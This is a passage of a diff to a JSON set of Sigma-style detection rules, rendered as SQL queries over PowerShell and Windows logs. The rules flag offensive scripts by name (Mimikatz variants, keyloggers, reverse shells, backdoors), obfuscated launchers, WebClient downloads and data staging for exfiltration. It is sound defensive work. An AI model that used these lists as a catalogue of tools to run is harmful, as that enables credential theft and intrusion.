OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", + "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_susp_zip_compress.yml" }, { - "title": "MSI Installation From Web", - "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", "status": "experimental", - "description": "Detects installation of a remote msi file from web.", - "author": "Stamatis Chatzimangou", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218", - "attack.t1218.007" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "win_msi_install_from_web.yml" + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "title": "Suspicious Get Local Groups Information", + "id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "author": "frack113", "tags": [ - "attack.t1219" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Administrator script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((Payload LIKE '%get-localgroup%' ESCAPE '\\' OR Payload LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ContextInfo LIKE '%get-localgroup%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (Payload LIKE '%Get-WMIObject%' ESCAPE '\\' AND Payload LIKE '%Win32\\_Group%' ESCAPE '\\') OR (ContextInfo LIKE '%Get-WMIObject%' ESCAPE '\\' AND ContextInfo LIKE '%Win32\\_Group%' ESCAPE '\\')))" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_susp_local_group_reco.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Suspicious PowerShell Download - PoshModule", + "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_pm_susp_download.yml" }, { - "title": "Windows Defender Malware Detection History Deletion", - "id": "2afe6582-e149-11ea-87d0-0242ac130003", + "title": "Alternate PowerShell Hosts - PowerShell Module", + "id": "64e8e417-c19a-475a-8d19-98ea705394cc", "status": "test", - "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", - "author": "Cian Heasley", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": 